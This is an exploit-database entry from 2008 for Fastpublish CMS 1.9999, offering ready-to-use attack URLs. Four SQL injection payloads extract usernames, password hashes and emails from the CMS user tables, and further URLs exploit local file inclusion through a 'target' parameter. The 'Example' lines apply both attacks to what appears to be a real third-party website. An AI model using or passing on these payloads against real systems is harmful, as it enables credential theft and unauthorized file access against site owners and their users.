Fastpublish CMS 1.9999 (LFI/SQL) Multiple Remote Vulnerabilities

2008-10-05T00:00:00
ID 1337DAY-ID-3838
Type zdt
Reporter 0day Today Team
Modified 2008-10-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Fastpublish CMS 1.9999 (LFI/SQL) Multiple Remote Vulnerabilities
================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection

SQL Injection

Exploit 1:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*

Exploit 2:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*

Exploit 3:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*

Exploit 4:

http://localhost/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*

Example:

http://www.jeremias-d-meissner.de/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type  ,user_name,user_pw),7,8,9,10+from+fastpublish__for  um_de_userdata/*

File inclusion

http://localhost/index2.php?artikel=3&target=./[file]

http://localhost/index.php?artikel=2&target=./[file]

Example:

http://www.jeremias-d-meissner.de/index2.php?artikel=3&target=./forgotpassword.php



#  0day.today [2018-03-28]  #